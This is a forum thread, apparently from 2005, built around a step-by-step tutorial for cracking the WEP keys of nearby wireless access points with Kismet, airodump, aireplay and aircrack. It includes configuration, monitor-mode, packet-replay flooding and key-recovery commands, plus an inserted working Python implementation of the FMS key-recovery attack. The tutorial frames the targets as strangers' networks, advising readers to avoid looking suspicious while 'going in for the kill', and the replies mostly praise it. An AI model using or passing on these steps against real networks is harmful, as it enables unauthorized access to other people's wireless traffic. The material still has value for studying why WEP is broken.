Full Version: Crack Wep [tutorial]
UmInAsHoE

WEP cracking [In 10mins]

Intro:

OK, this is a tutorial explaining how to crack most WEP-encrypted Access Points out there. The tools used will be as follows:

Kismet (any working version)
>= Aireplay 2.2 beta
>= Aircrack 2.1

As for wireless cards, I recommend any Prism-, Orinoco- or Atheros-based card (I used the D-Link 650 Rev.1a).


Getting Started:

Let's see. The first thing you are going to want to do is charge your lappy to the top (aireplay and aircrack drain the battery quite a bit). Next you are going to want to load up your favourite live CD (I used Whoppix 2.7 final) or Linux OS, then stumble across an encrypted WLAN; use Kismet to do so. Make sure you have configured your kismet.conf file correctly to be able to use your card (locate your kismet.conf file and open it with your favourite text editor; I used pico):


CODE
# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.
# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE
source=orinoco,eth1,kismet
#source=wlanng,wlan0,Prism
#source=kismet_drone,192.168.2.252:3501,kismet_drone


^^ That is an example of part of my kismet.conf. Initially that was wrong for me: I had to comment out the first line and uncomment the second (my wireless device name was wlan0; you can find this out by typing 'iwconfig' in a terminal).
Note: To find your card's chipset, have a good Google on the model number of your card or try checking here: http://www.linux-wlan.org/docs/wlan_adapters.html.gz . A full list of supported chipsets can be found on the Kismet website under Documentation.

Changed kismet.conf:

CODE
# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.
# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE
#source=orinoco,eth1,kismet
source=wlanng,wlan0,Prism
#source=kismet_drone,192.168.2.252:3501,kismet_drone


Save the changes you make, go back to a terminal and run 'kismet'; it should load up if you configured it properly. Once you have got Kismet going, have a good stumble around your area to see if a WLAN has WEP enabled. Kismet should have a column near the ESSID titled 'W': if WEP is enabled it will show a Y, if not it will show an N.


Going in for the kill:

So now you've got a target. Make sure you don't look suspicious and that you've got at least 15 mins' worth of battery life left :P. Make sure you know the channel the Access Point is on (under the CH column in Kismet) and also the MAC address of the Access Point, by hitting 's' (to sort), then scrolling to the desired Access Point and then typing 'i', which gives you detailed info on the Access Point selected.

First off you are going to want to set your wireless card to the right mode; which commands you have to use depends on your chipset:

CODE
If you use madwifi, you may have to place the card in
pure 802.11b mode first:
iwpriv ath0 mode 2

If you use wlan-ng, run
./wlanng.sh start wlan0 <channel> [comes with Aireplay 2.2]

Otherwise run:
iwconfig ath0 mode Monitor channel <channel>
ifconfig ath0 up


Read the Aireplay 2.2 readme for more info.
Start by opening up another terminal window, cd into your aircrack directory and launch airodump:
CODE
#./airodump
[version crap]
usage: ./airodump <wifi interface> <output filename> [mac filter]

e.g
./airodump wlan0 linksys

The MAC filter is used when you have more than one Access Point on the same channel at once. So say you have 'jim_home' and 'linksys', both ESSIDs of Access Points on channel 11: you would grab the MAC address of the Access Point in Kismet by hitting 's' (to sort), then scrolling to the desired Access Point and then typing 'i', which gives you detailed info on the Access Point selected. OK, so now you have got a stream of packets from your target. You see the IV column; those are what's known as 'weak key' packets, and we want as many of them as we can get (400k+ is a nice number :P). Now we are going to capture a 'weak key' packet from the network we are targeting and flood the Access Point with it, in the hope that we get lots of 'weak key' replies sent out so we can eventually crack the password. So now, in your other terminal window, 'cd' into your aireplay directory and execute aireplay ('./aireplay' [return]):


CODE
capture packets unless interface #1 is specified.
source options:
-i        : capture packet on-the-fly (default)
-r file   : extract packet from this pcap file
filter options:
-b bssid  : MAC address, Access Point
-d dmac   : MAC address, Destination
-s smac   : MAC address, Source
-m len    : minimum packet length, default:  40
-n len    : maximum packet length, default: 512
-u type   : fc, type     - default: 2 = data
-v subt   : fc, subtype  - default: 0 = normal
-t tods   : fc, To   DS bit - default: any
-f fromds : fc, From DS bit - default: any
-w iswep  : fc, WEP     bit - default: 1
-y        : don't ask questions, assume yes
replay options:
-x nbpps  : number of packets per second
-a bssid  : set Access Point MAC address
-c dmac   : set Destination  MAC address
-h smac   : set Source       MAC address
-o fc0    : set frame control[0] (hex)
-p fc1    : set frame control[1] (hex)
-k        : turn chopchop attack on


e.g
./aireplay -b 00:FF:00:FF:00:FF -x 512 wlan0

Here we are going to grab a few packets from the Access Point with the MAC address 00:FF:00:FF:00:FF until we catch a 'weak key' packet, which aireplay will then ask you if you want to use to flood the Access Point. When it asks you if it can use one of the packets, hit 'y' then return. If you flick back to your terminal with airodump running you should see the packets being captured increase by a huge amount, and with that the IV packets should also be increasing pretty damn fast as well; if all went well, in about 10 mins you should have enough packets to dump into aircrack. OK, so you want at least 400k+ IV packets (the more the better). Once you've got a decent amount, hit 'control+c' in both terminal windows to terminate both aireplay and airodump, then 'cd' into your aircrack directory and run aircrack ('./aircrack' [return]):


CODE
aircrack 2.1 - (C) 2004 Christophe Devine
usage: ./aircrack [options] <pcap file> <pcap file> ...
-d <start> : debug - specify beginning of the key
-f <fudge> : bruteforce fudge factor (default: 2)
-m <maddr> : MAC address to filter usable packets
-n <nbits> : WEP key length: 64 / 128 / 256 / 512
-p <nfork> : SMP support: # of processes to start
-q <quiet> : Quiet mode (less print more speed)


e.g
./aircrack -n 128 linksys.cap

What I did there was set aircrack to read my packet file called linksys.cap (what airodump creates) and tell aircrack it was 128-bit encryption. If all goes well you will get the key in nice red text.

KEY FOUND: [ Pwn3d ]

Happy WarDriving.

(Please reply with any errors in my tutorial)
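To make concrete what the 'IV' count and the 'weak key' packets in the post actually are, here is an added example (my own code, not from the post and not aircrack's or aireplay's source) of the Fluhrer, Mantin and Shamir (FMS) attack that this style of WEP cracking is built on. Every WEP frame carries its 3-byte IV in the clear and RC4 is keyed with IV || secret key, so the attacker knows the first three key bytes of every frame. For a small fraction of IVs (the classic class is (B+3, 255, x) for secret key byte B) the first keystream byte leaks that key byte with roughly 5% probability, and because the first plaintext byte of a data frame is the LLC/SNAP 0xAA, the first keystream byte is known. Votes over many such frames recover the key one byte at a time; that is why the post wants hundreds of thousands of distinct IVs, and why replaying a frame helps: every reply comes back under a fresh IV. Assumptions in the code: a 40-bit (5-byte) key, the 0xAA known plaintext, a CRC-32 ICV, and a constructed capture that is deliberately biased to contain all 256 IVs of the weak class for each key byte plus random filler (a real capture needs millions of frames to hold that many, which the -f fudge factor shown above and the extra IV classes in later aircrack versions compensate for). The key, IVs and payloads are made up.

```python
"""FMS-style statistical WEP key recovery on a constructed capture (added example)."""
import random
import zlib
from collections import Counter

# LLC/SNAP header every 802.11 data frame starts with; byte 0 is the known plaintext.
SNAP_HEADER = bytes([0xAA, 0xAA, 0x03, 0x00, 0x00, 0x00, 0x08, 0x00])


def ksa(key, steps=256):
    """RC4 key scheduling. Returns (S, j) after `steps` iterations so the attack
    can stop early and inspect the partial state (key = IV bytes + secret bytes)."""
    S = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j


def rc4_keystream(key, n):
    """First n bytes of RC4 keystream for `key`."""
    S, _ = ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(iv, key, plaintext):
    """WEP: per-frame RC4 key is IV || secret key; ICV is CRC-32 of the plaintext."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    ks = rc4_keystream(bytes(iv) + bytes(key), len(plaintext) + 4)
    return bytes(a ^ b for a, b in zip(plaintext + icv, ks))


def wep_decrypt(iv, key, ciphertext):
    """Returns (plaintext, icv_ok); icv_ok is how a candidate key gets verified."""
    ks = rc4_keystream(bytes(iv) + bytes(key), len(ciphertext))
    data = bytes(a ^ b for a, b in zip(ciphertext, ks))
    body, icv = data[:-4], data[-4:]
    return body, zlib.crc32(body).to_bytes(4, "little") == icv


def fms_vote(iv, known, ks0):
    """One FMS vote for secret key byte index A = len(known).

    known: secret key bytes already recovered (the IV supplies K[0..2]).
    ks0:   first keystream byte = first ciphertext byte XOR 0xAA.
    Returns a candidate byte, or None when the IV is not 'resolved', i.e. after
    A+3 KSA steps it does not hold that S[1] < A+3 and S[1] + S[S[1]] == A+3.
    """
    A = len(known)
    S, j = ksa(list(iv) + list(known), A + 3)
    if not (S[1] < A + 3 and ((S[1] + S[S[1]]) & 0xFF) == A + 3):
        return None
    # If the remaining KSA steps leave S[0], S[1], S[A+3] alone (about 5% of the
    # time) the first keystream byte is S[A+3] after step A+3, which sat at
    # S[j + S[A+3] + K[A+3]] before that swap. Invert that for K[A+3].
    return (S.index(ks0) - j - S[A + 3]) & 0xFF


def recover_key(frames, keylen=5):
    """Byte-by-byte majority vote; frames are (iv, ciphertext) pairs.
    Only the IV and the first ciphertext byte of each frame are ever used."""
    known = []
    for A in range(keylen):
        votes = Counter()
        for iv, ct in frames:
            guess = fms_vote(iv, known, ct[0] ^ SNAP_HEADER[0])
            if guess is not None:
                votes[guess] += 1
        if not votes:
            raise ValueError(f"no resolved IVs for key byte {A}")
        known.append(votes.most_common(1)[0][0])
    return bytes(known)


def build_capture(key, seed=2005, filler=2000):
    """Constructed capture (not real traffic): for each secret key byte B all 256
    IVs of the classic weak class (B+3, 255, x), plus random-IV filler frames."""
    rng = random.Random(seed)
    ivs = [(B + 3, 255, x) for B in range(len(key)) for x in range(256)]
    ivs += [tuple(rng.randrange(256) for _ in range(3)) for _ in range(filler)]
    rng.shuffle(ivs)
    frames = []
    for iv in ivs:
        payload = SNAP_HEADER + bytes(rng.randrange(256) for _ in range(16))
        frames.append((bytes(iv), wep_encrypt(iv, key, payload)))
    return frames


if __name__ == "__main__":
    secret = bytes.fromhex("0badc0ffee")  # made-up 40-bit key
    frames = build_capture(secret)
    found = recover_key(frames, keylen=len(secret))
    iv0, ct0 = frames[0]
    _, icv_ok = wep_decrypt(iv0, found, ct0)
    print(f"KEY FOUND: [ {found.hex()} ]  ICV check on frame 0: {icv_ok}")
```

Run it as-is to watch the vote recover 0badc0ffee and check the result against the ICV of one frame; for the 128-bit case the post cracks with -n 128, pass a 13-byte key to build_capture and keylen=13 to recover_key. Note that recover_key never touches anything but the IV and the first ciphertext byte, and that a wrong guess for an early byte poisons every later vote, which is exactly what aircrack's fudge factor (trying the runners-up) is there to recover from.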
Aicd
Good job man, this is a great tutorial. Most of the tutorials I have seen on the top are, ehh, very Prism-based-card biased. Just my 2c. Thanks for this great tut ;]
IronEagle
Thx for the tutorial, it's very nice, I will test it now.
belgther
That's nothing new. Look here:

http://www.governmentsecurity.org/forum/in...topic=14890&hl=
UmInAsHoE
Yes, that's the Whoppix tutorial; I based this one on that (if you read it, it says so in the first 5 lines). I am not trying to steal thunder from Whoppix. This tutorial expands on it and adds detail.
murtun
Nice one UmI. Like the fact it's explained in text too. Flash tuts sometimes aren't very portable and can miss out more technical details.

/me adds tut to his archive :)

belgther: you should read the tutorial before you comment on it :P

dw-chow
QUOTE(belgther @ Jun 22 2005, 07:32 AM)


These guys are trying to get in as full-fledged members. There's no need to always hit the search button and shoot them down. Personally, I think it's explained pretty well.
mystic_traveller
I have a laptop loaded with Fedora, Kismet and AirSnort, and I can find loads of encrypted networks where I live, but I'm thinking: is it too late in the day for me to try and have some fun?

i.e. have all the manufacturers fixed the issue with WEP? I don't want to be sat outside a building or house trying to crack a WEP-enabled AP when there is no point.

I have heard that you cannot crack Cisco because you cannot get more than 96 packets or 'interesting packets'.

Anyway, if anyone can let me know, I would appreciate it.
castor00
We've got some wifi networks at work... thanks for sharing that tuto, it's gonna be useful to check if they are secure.
Invision Power Board © 2001-2005 Invision Power Services, Inc.